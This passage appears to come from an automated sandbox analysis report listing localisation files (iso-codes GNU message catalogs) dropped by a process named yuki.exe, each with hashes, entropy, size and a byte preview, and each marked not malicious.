                                                                                                    SHA-256:7A4D1D7A2A06C052FD542673E4DD0558B8F4092FE264DDF57B5AB0336E08F3A8
                                                                                                    SHA-512:18D1D033BFC30FA60153DCC4169F8F1B1CD6A68087D2E9C57664DD4E010A6DA075B3E8C9E2BC78360F86EF8444B4C8EE08D82042467A00ED95B8F36E129F3248
                                                                                                    Malicious:false
                                                                                                    Preview:........`.......................(.......).......@.......U.......e.......z.......................................................................*.......C.......Z.......k.......~...................................................................!...........9.......S.......d.......u...........$.......#.......%...........................2.......J.......].......t...............................................................................3.......E.......Y.......j.......|...............................................................................,.......>.......Z.......q............................................................... .......5.......G.......Y.......l.......{.......................................................................-.......<.......R.......e.......}.......................k.......................................................................................!.......7.......H.......^.......x.......................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 210 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9210
                                                                                                    Entropy (8bit):4.704337453340897
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7Q66TkC6KjjV9hYKJyo2kddTsPzugokVENSfGOIqYzU5EU05:7JKnTTydSdo7ugokVEfOI/g5EUa
                                                                                                    MD5:504B9202ECD7A5E2096711D826B111AD
                                                                                                    SHA1:6612BE0592553B5FA4C24F80313E954DB5599ABE
                                                                                                    SHA-256:B617BF91B39F7E8B19580CBF01CCD1CAD8D127E37D46CD15023B3A6F3A628D3E
                                                                                                    SHA-512:641ABFD3FF59C22AF1E5C4166E2DB0C03632B8E2BDC7EB999DD50EACECB3154BB0814755F7BBFF7EAD4E5AAA91A4B6EF5AAC5302A38043A74C5E981B0A70E906
                                                                                                    Malicious:false
                                                                                                    Preview:........................<.......................................................................................................................".......-.......5.......@.......I.......Q.......Y.......`.......f.......n.......u.......}...............................................................................................................G.......L.......R.......[.......c.......p.......{...............................................................................................................................5.......:.......B.......I.......Z.......`.......h.......p.......v.......................................................................................................................................................................*.......1.......7.......?.......E.......L.......S.......^.......d.......m.......t...............................................................................................................................................................%.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10637
                                                                                                    Entropy (8bit):5.170106783608846
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dcrNje9Oy/EWltU4WjV9qWxa5hW88SgcpPxsKRjsk2oNNu:UJA9EWg4WjVDxa5hW88Vss+js+Nw
                                                                                                    MD5:D316A67ABCCE4A69FE2096132D11ABC9
                                                                                                    SHA1:178A0645AF40E57EAF48EABB58BAF66462E9AA78
                                                                                                    SHA-256:36C444F77A3E1B966A84714FCC92DE131AEA87F54AAD0126E7E0D24A56E3140A
                                                                                                    SHA-512:736E36FB705C5888AA305B3D7DD3CE7C901A74BCC938E9DB050172CA4277C43CD7C1D04F9A26FB9B20300BFBD69E6C6A4F5BA498CA355722D1AF2A9ED7460D63
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24295
                                                                                                    Entropy (8bit):5.1734064049340756
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosxYAq8E13GC046nbjz5wsWP48WAINiZGQTLYXaJpPlwAlS:0oDvVx048fmsWP48WAIOvYXabPCAQ
                                                                                                    MD5:FC9310EE6EC49C3568D41BC8916396D5
                                                                                                    SHA1:A0C82F31622EC3157C5B5BFFA217046B31D9C77A
                                                                                                    SHA-256:03CD85FFD75823070848E43EE3A5DA03C38A439204514C28D78EA81B73683199
                                                                                                    SHA-512:63C021C44BC7A7DAD9C433B8D671A070B7D30E43EC9F937B525DE80294F9C82654CFC0C85D48C357E59AA5FA5B783AB866B5E7F30BF3242BCCA32BA418D51B84
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 92 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4405
                                                                                                    Entropy (8bit):4.867590425865491
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:vngUDLZw5xyLlAnuaI86lx8V0fQmq2n/f6l1CKcPt/BmUOQ3:v9ZAnuaInxUaQmP/iC1P1BCQ3
                                                                                                    MD5:0BFD6252D594868A0066C4047D66F8C9
                                                                                                    SHA1:16FC3D01DAF9C65B2A9E7B51DCB4A45A468AB454
                                                                                                    SHA-256:349DE4406792C4E383387DA015DECBE1D31C16A0965F1C1610CA886A008A5FDD
                                                                                                    SHA-512:09AF638B523AE0A9FF6AD8F9418C8A6D7B4A0C87A848DB05B50E061E9157FFBDEF4318D0636146988AD241E4718EAC21E8C6341F2AF9F8C51A93622CF23CCE92
                                                                                                    Malicious:false
                                                                                                    Preview:........\...............................................................................................................%.......,.......5.......;.......D.......M.......V......._.......d.......l.......t.......y.......~...............................................................................................................................................!.......).......5.......D.......I.......M.......^.......d.......i.......o.......{.......................................................................................................................:.......B.......K.......P.......U.......\.......f.......q.......|...................................................................$...........................%.......0.......<.......D.......V.......[...$..._....................................................................................................................................................... .......'......./.......4.......9.......=.......F.......Q.......[.......`.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Breska su\303\260urskautslandssv\303\246\303\260i\303\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2961
                                                                                                    Entropy (8bit):5.340882096919249
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3rlDlArsS/t+vGqIfdvqN5CoU960IC11srDWv1IZVT9BnR4moJuqy8:rLv1lArd+yaCos605IS+nuzJuq
                                                                                                    MD5:7492C79A258730699FF488A8B2CF0351
                                                                                                    SHA1:E3B319E502F8802E2A02FAD8CE04E9154571AEB5
                                                                                                    SHA-256:1F80D8D5F67FC99875745CBC0C26B358BFF02AA10C6C157A8B9643B1EBC324D1
                                                                                                    SHA-512:95D1811EE1B194ADA0389A6AAB388E1E7393F3DEA17680D69BB214BB3655EE886B5F1296134200F4AD991C1F3F855D339F4DDF743672D6D7A71AC4FA0367B4CA
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................!.......0...!...5...R...........6...............................................1...5.......g...................................................A....... ...7.......X.......s.......z...".......4.......................................3...J.......~........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 177 messages, Project-Id-Version: iso_4217 'ADB eining fyrir reikning'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9804
                                                                                                    Entropy (8bit):5.076062175012264
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:OYbsIVH9sqYP7i2RyK0G/2LC9r18gEyTjJESVkaoKzxS3vQ:vs9m2RL0G/UWB8gBDkOMQ
                                                                                                    MD5:AD82E759B35076C1C9A9B3CEACFE439D
                                                                                                    SHA1:2356F35A614C1A5F22458DEBA985CC2A3F6AC6AD
                                                                                                    SHA-256:F5617EF539E0F31BA748A7097EC62EBC62FD7C68C69EAAD37C1D656A14D1DBEE
                                                                                                    SHA-512:B6B622221262EC45098E7962744C9B9CE74C59CA34568D895BE07D88D51D7312A0AD16F7560925E978A432EEE60375922F2A42BF3EF61CF2A61A24389FE5A7AE
                                                                                                    Malicious:false
                                                                                                    Preview:........................,...............................................#.......1.......?.......Q.......b.......r...................................................................1.......3.......9...O...7...................................................................#.......5.......E.......[...0...h.......................................................................................".......(.......7.......=.......L.......Q.......g.......v...............................................................................................................".......*.......8.......E.......R.......^.......n.......~...............................................................................................................................................*.......<.......L...!...Y.......{...............................................................................................1.......:.......K.......[.......c.......r.......|...............................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3510 messages, Project-Id-Version: Icelandic (iso-codes) ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):149997
                                                                                                    Entropy (8bit):5.2368339101502785
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:eXD+slPOkAmANniu00JOr1CNfvtSPYdACXTzCLc2irkVn8M3SbPpTPQzu7cN:ieLhehMflSPYjj2Y2irkVn8M3SbPprmf
                                                                                                    MD5:DB501005B3F17557C602255EAF5E4164
                                                                                                    SHA1:566A22C86BDCE0F05C266814575BDB125C72E448
                                                                                                    SHA-256:3283039E071CB3A882B70057B72D469E369A8CAC95F4CF0F5D3A04613C11EF67
                                                                                                    SHA-512:90872E5F742FAD2948E175B4D29739B7B00979294824CB408FAF83C9CF9CF6E123A0EF095F2C5B98B22B799751E4A4D020A3F484EA9008074AA453B0EDC73CC7
                                                                                                    Malicious:false
                                                                                                    Preview:.................m..S...|........$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%.......%......"%......*%......1%......:%......D%......T%......d%......i%......n%......t%......x%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&......#&......)&......0&......4&......>&......L&......T&......Z&......a&......h&......m&......t&......|&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'......''......2'......9'......B'......H'......R'......\'......c'......o'......w'......|'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(......$(......-(......6(......>(......G(......L(......V(......_(......g(......k(......p(......u(......}(.......(.......(.......(.......(.......(.......(......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afr\303\263-as\303\255sk tungum\303\241l'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8015
                                                                                                    Entropy (8bit):5.000675667874566
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDx4v39WK4f4SE0BfNca38bFnxzIZoWI:XWlZGE0BfNca38pnxzIZoWI
                                                                                                    MD5:8F5DE773CB8CEB032A307AB5AFF40BBB
                                                                                                    SHA1:9115969A6922C52972AD611725B879D264647690
                                                                                                    SHA-256:6D5351729480AD62BB7639E99A138CF041B0F6E6064F3AD537AFCC941AAC0892
                                                                                                    SHA-512:1F1BBBD97A4AECF49F8041A68A9E9EDA4F6C4F14F872AA7A784EF0F60504ED744AC88B5D7664588DC9204EFB723F874D6F6480C9C8BBBFE80D168EABC8F02014
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...............................#...........8.......O.......b.......v.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 172 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9447
                                                                                                    Entropy (8bit):5.006380327770385
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:QXTE+02VKrY3G9zzib4DjVhSa5hW8cX310z++UbyCk4bmKbGEPVI9:4E+079u4DjVMa5hW8Q3Oy+UF5PG
                                                                                                    MD5:D1D521E7125DC4B73BE94976617CBD63
                                                                                                    SHA1:AEC3113D4D7DBB73BA7021836ECF83EC3B90E0DB
                                                                                                    SHA-256:DCF7227CBF302A9C1B5B1F5D1521E455E44E81364BA8966F5F195EFB4EF77567
                                                                                                    SHA-512:7C9E9E64948B6D947AB1DF25CAFBD1D67B3D4ABEAF42484AFCDD6D77E82624F8F8700CB0107AF182533D4005280E055E2502753ABB940AF286F016A7BB75D59F
                                                                                                    Malicious:false
                                                                                                    Preview:................|...............p.......q.......w...?...}....................................................................................... .......,.......5.......<.......D.......M.......S.......Z.......m.......t.......y...........................................................................&...'.......N......._...(...s.......................................................................................#.......,.......5.......O.......h...........................................................................4...........c.......l.......t.......{...................................................#...........................................".......(.......@.......W.......f.......l.......u.......~.......................................................................................................,.......=.......R.......a.......o...(...y...................................-.......................................#...........A..."...a...)...........................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23660
                                                                                                    Entropy (8bit):4.962433379573596
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:snboRT6k+bRBUr3iRirwISzmwZbjh5wsWP4XWAIziUGPBoEpiBOqkFSO/LrAqng:sxcr3iRik7zmotmsWP4XWAIg9IXkFSOS
                                                                                                    MD5:0C726D6DC0932E9C937F6FAFA96D292F
                                                                                                    SHA1:95A552CF8C08B8C9C072DCA041E9A1374107C37C
                                                                                                    SHA-256:3E81DF026C824563A59DB4E011BC404E99F833110DF737754B815DC69C467473
                                                                                                    SHA-512:24C677E6FF8BE867167A709FCF1FA4319D5EB86495EDAB7C64EB2B8D7306321696ABAB864CDB23AA1BC66A98F74026D395D481B02CD948B8EA9A50272753FAEE
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8#......9#......E#......M#......U#......d#......l#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......&$.......$......5$......;$......C$.. ...J$......k$......s$.. ....$.......$.......$.......$.......$.......$.......%.......%......1%......:%......G%......O%......Z%......c%......l%......s%.......%.......%.......%.......%.......%.......%.......%.......%.......%..,....&......@&......H&..%...N&......t&.......&.......&.......&.......&.......&.......&.......&.......&..%....&..,....&.."..."'..*...E'......p'......x'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(......#(..'...1(..$...Y(......~(.......(.......(.......(.......(.......).......).......)......#)......1)......B)......R)......n)......t).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3684 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):157445
                                                                                                    Entropy (8bit):5.230907502255685
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:DLZcUJqRx7M0piJznje9NfNVXddm+HSEg2lpJDyYRsO3dkHRc6+bA1Onpiw0:D9ccqRmr6j5yEgupPdOc6wA1Upm
                                                                                                    MD5:4036172CBE6A8031F4779E3805C58AEE
                                                                                                    SHA1:1108AA54609C4833FBB5E294CD4A1593812D89FD
                                                                                                    SHA-256:81AEEFD1120375C7616D04C0B981AC324753D0D60B1FBBD814DF266EF0542707
                                                                                                    SHA-512:BDEDA909CAA3D3B318E591822A038307CEBC071C058671084C09DEDBF11F52AA30E399F8DE663E90A0F1333E335EBDFDEDA09844176827C7E370DC5F4E9D6523
                                                                                                    Malicious:false
                                                                                                    Preview:........d.......<s..7...\.......83......93......>3......D3......L3......S3......a3......o3......t3......y3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......4.......4......%4....../4......>4......O4......^4......c4......o4......u4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......5.......5......%5......15......=5......M5......X5......d5......r5......{5.......5.......5.......5.......5.......5.......5.......5.......5.......5.......6.......6......&6......06......:6......B6......L6......Y6......c6......r6.......6.......6.......6.......6.......6.......6.......6.......6.......6.......6.......6.......7.......7.......7.......7.......7......'7......37......97......D7......L7......S7......Z7......c7......s7.......7.......7.......7.......7.......7.......7.......7.......7.......7.......7.......8.......8.......8.......8.......8......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Territorio antartico britannico'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2720
                                                                                                    Entropy (8bit):5.0931571792611905
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADl9SxjfGLRvGqIfdvqNuoUOvej3zuqVmVx4eNpu0:qDn9yBoTej3nUTNL
                                                                                                    MD5:A7CA16A51769645809BA54B41622A9B2
                                                                                                    SHA1:537F39822FBF8C5153A5E6F6456ACFE8356E7329
                                                                                                    SHA-256:3879F5A22D0745E280B80E622FC52EBDC2644EC0752607C1F909D08AF1A1B4CF
                                                                                                    SHA-512:DC69654AF7787A401D4BD0256CCBAF9F809DFFF007BA5CDCFB7F2C3686C6F436D3490B91F0F2B5AE178A1FAA9D583AF0687B34A82475AE65417C2BFE5AB58805
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................`...1.......*...............2...........*.......2.......J.......T...+...j...$...................................................$.......2.......?.......n...................................4...............#...(.......L...,...[................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 172 messages, Project-Id-Version: iso_4217 'Unit\303\240 di conto della ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9244
                                                                                                    Entropy (8bit):4.897202216537123
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zbcx66OE6YLXifAMQ1M29BypRHDdTNWtKMJVpkS2SILCLKmxej2jsKNUPIPmItg:Mx66a4MPPByK0nMLCzz45fItg
                                                                                                    MD5:B8A98B33357F309F0B3EA969487F2183
                                                                                                    SHA1:2337394063FD8D6B406BFED284738A34BE109B68
                                                                                                    SHA-256:1E8DB129CAA17C38868D27423C8D2B23AFFD24813B9E78E750568791A07B4E0F
                                                                                                    SHA-512:BE5885BC8A14F93C4082CBCC24549564AA85616B776C314C6BC18FE3FB366CC52A0A7EBC51209BE48EF6FC9B199462316BF6CDA0D113F4C62D86139DB4EB65C8
                                                                                                    Malicious:false
                                                                                                    Preview:................|...............p.......q.......................................................................................................%.......6.......D.......U......._...1...q...3.......9.......7...........I.......X.......f.......t...........................................................0...........!.......0.......?.......O.......`.......l.......~...............................................................................................................$.......;.......G.......N.......Y.......i.......n.......u.......}....................................................................................................... ...............5.......:.......?.......N.......R.......Z.......`.......p.......}.......................................................................................................$.......3.......Q.......d.......v...............................................................................................................,.......1.......=.......E.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 8453 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):369645
                                                                                                    Entropy (8bit):5.242143019319363
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:w2mPqvHL0UUhuLKOdyl/rtOYiCT9g+MLc0wWtenPUg8ETUc7ImtW/jH233fCx:w2P09ILKzknE18QbEmCIax
                                                                                                    MD5:FFDB8640EEB5468B24C62922B07B7F7D
                                                                                                    SHA1:73B4F3476C0E3A3D33C5DE6D2A6D78CF7FD3BF16
                                                                                                    SHA-256:68FB0FD4E64079B6B570C793C06367469FA3152B402DE5F4A273E7B2C2123564
                                                                                                    SHA-512:9259835EC86842F4047591132293D8381F2DBE4ABBCE5E867C33D19496822B68CC1222911D273027EF8179FADA15ECB9A42A3ACD7929B1FCCD66C099EC79E0AD
                                                                                                    Malicious:false
                                                                                                    Preview:.........!......D....,..l.......................................................................................................................................................................&.......6.......F.......K.......P.......V.......Z.......g.......l.......q.......v.......|............................................................................................................................................... .......8.......>.......F.......N.......T.......[.......a.......h.......l.......v...............................................................................................................................................'......./.......7.......=.......K.......Q.......V.......f.......l.......s.......w.......|.......................................................................................1.......E.......P.......W.......`.......f.......p.......z.......................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 107 messages, Project-Id-Version: iso_639-5 'Lingue camito-semitiche'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6985
                                                                                                    Entropy (8bit):4.74583521614471
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4RXVa1s7yZNJAC6522g/ebsKuSE0Cufr5VcJHVCGej2VqJ3E/kMuaAhNhRkn:RtZNX6522gG+SE0ZcaKVqJEkMuHh+
                                                                                                    MD5:C7ABCE113AFF4B248E538A7B95637361
                                                                                                    SHA1:38F8D662C7BD7A287D4BBEEADDB12C6EDBB0EC20
                                                                                                    SHA-256:95947CD4590692297AC190882CEA2B4CEBB26E9FC07548B0E65E5A20F9F41CE3
                                                                                                    SHA-512:623636F71B95606BD3EECA532661AA48C8EA6C8FC6A86F5228B8226957F2A1630ADF20383A099C91033438D5EFB7379899ABC4331AB77142A0C133EAB15F1921
                                                                                                    Malicious:false
                                                                                                    Preview:........k.......t............... .......!.......8.......K.......[.......p.......................................................................+.......>.......N.......^.......n...................................!...................................%.......8.......I...%...]...................................#...........................-.......D.......W.......j.......z.......................................................................#.......5.......E.......W.......m.......{.......................................................................'.......9.......U.......l.......................................................................0.......B.......T.......f.......y.......................................................................+.......E.......\.......j....................................................................... ...#...6.......Z.......j.......z.......................................................................................$.......4.......K.......`.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 26 messages, Project-Id-Version: iso_3166-1 '\341\220\212\341\224\205\341\221\246\341\225\214\341\223\225\341\220\212'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1634
                                                                                                    Entropy (8bit):5.306254300623615
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3Pws3nPQnQfa2KtSBaC5liUecFQyyd5l1TEaNbXjt0UjL/nXmGRnsFMb55vgYltU:fwYniUaA0UcfXTF9yU/eJgfpXD2
                                                                                                    MD5:382AE509B1EAE39CF80EFD6FE284EABD
                                                                                                    SHA1:442408BC80A51239117522A15CFF5A76D787CD67
                                                                                                    SHA-256:28C2F6E8B03C59FC9A949D87A66591A36BD1C37C95D119F1791A2E32C1266F1D
                                                                                                    SHA-512:F2E6433D89B9AFB48A884A591403565ABB55F0DD0683E02798E28A57A3A69294126E9C8624705C723B1130C5CB9A5E4282A73AB00344359F8F1CB57D3E7A7063
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........P.......Q.......[.......b.......h.......m.......u.......}.......................................................................................................................................................8...............".......,.......3.......A.......Q.......[.......n.......{...............................................................................................................*.......;.......R........................................................................................................................................................Australia.Canada.Chile.Cuba.Finland.Germany.Greenland.India.Indonesia.Iraq.Italy.Japan.Kazakhstan.Lithuania.Mexico.Norway.Pakistan.People's Republic of China.Peru.Poland.Spain.Sweden.Ukraine.United Kingdom.United States of America.Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-29 06:30+0000.Last-Translator: Chris Leo
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 70 messages, Project-Id-Version: iso_15924 '\343\202\242\343\203\251\343\203\223\343\202\242\346\226\207\345\255\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4131
                                                                                                    Entropy (8bit):5.36929315304893
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:nZSLbIbrE4AbdbAWJ9Vug3LXllUMp6R9bskGpiUJjY1a6V:nZSLbqEtbdjbllHp6RqzSMM
                                                                                                    MD5:2FF97E8A2069A14AE7744A80034180ED
                                                                                                    SHA1:B034A5F6E8084BCD36127BCCBC956AEC77210940
                                                                                                    SHA-256:FA32424C2F893001D1DA68A55FD23A8CE511BA595ACF744482FFD6C54AF4471D
                                                                                                    SHA-512:CB763847A7E41DC375C97B72E922A4447879188B390475EC98ADC58E7217F6A10823DFC57E442FCA2C7615565C961982B220E4952A60749C2F3DD8D6A548BDEA
                                                                                                    Malicious:false
                                                                                                    Preview:........F.......L...a...|............................................... .......(.......4.......=.......D.......L.......U.......[.......`.......i.......o.......v.......~...........................................................................................4...(.......].......f.......n.......w.......................................................................................................................................................%.......,.......4.......A.......H.......Q.......X.......^.......e.......l.......t.......{...........................%...................................................................................................4.......G.......W.......j.......z.......................................................................4.......D.......W.......p...................1.......0...........................,.......9.......X.......k.......x.......................................................................$.......7.......M.......i.......y...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 413 messages, Project-Id-Version: iso_3166-1 '\343\202\242\343\203\225\343\202\254\343\203\213\343\202\271\343\202\277\343\203\263'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24942
                                                                                                    Entropy (8bit):5.500632735620859
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:pyRSKz9sEwz/rZhgPMlAu9fMxbje5wsOP4XLAI1irGk3adOpeHNMw7iiF7d9kne:pc6w8Au9fg6msOP4XLAIqhbViF7ge
                                                                                                    MD5:4851A1290AF6DDB63DBAFF04E97A0987
                                                                                                    SHA1:3D7B47280D2D88FE08F26D304274196C6D0F8BF8
                                                                                                    SHA-256:07A1D16B5B966E36E95E962BF6808EDC8BADEFD3EF857F66C3B0D3E676AB758E
                                                                                                    SHA-512:8F7D98DF6B2A54889256740676202838512AC436981382BD9C40742D81D5D0BB6BE5B5F2EE63E84E07640AD34F07DE9CE791857CD34D5376CBB0BC7C34667BF6
                                                                                                    Malicious:false
                                                                                                    Preview:....................-............".......".......".......".......".......".......".......".......".......".......#.......#......$#......7#......?#......E#......O#......W#......b#......j#......r#......}#.......#.......#.......#.......#.......#.......#.. ....#.......#.......#.. ....#.......$......3$......<$......J$......Q$......p$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%.......%......%%......=%......F%......_%..,...{%.......%.......%..%....%.......%.......%.......%.......%.......&.......&.......&...... &..%.../&..,...U&.."....&..*....&.......&.......&.......&.......&.......&.......'......!'......''......3'......E'......M'......U'......^'......z'..'....'..$....'.......'.......'.......(......)(......H(......f(......k(......s(......z(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......)......%)....../)......7)......B)......G)......Q)......Z)......a)......o)......v)......|)..!....)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2100 messages, Project-Id-Version: iso_3166-2 '\343\202\250\343\202\246\343\202\242'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):99516
                                                                                                    Entropy (8bit):5.227387155200333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:VkiJB/fMUroxcrn6iZtqyIzMC7z5pURXR0UY+3zblrutM3UoVATuxFHb:eIBnZro2sR7z0UUYI/lrutM3UoVATMF7
                                                                                                    MD5:45AEAEA4DA6C200E27A461DF1B32E9B9
                                                                                                    SHA1:21BACA8F54C5C8D2C58DFDF4CC4718A79A5491F4
                                                                                                    SHA-256:F60AF1263A27993C4135C6DF27C1E65EACA00CE904C2EA78B1EE0EE3C3225EBE
                                                                                                    SHA-512:1B6F227B8EFADEE10DDE68F1ADA6ACC51A39FCC295813A31A167E20CE35D5D1AC20E3766F1AA845CC02ABEB50132539F100A13551C151B37CB0584C08FA6366C
                                                                                                    Malicious:false
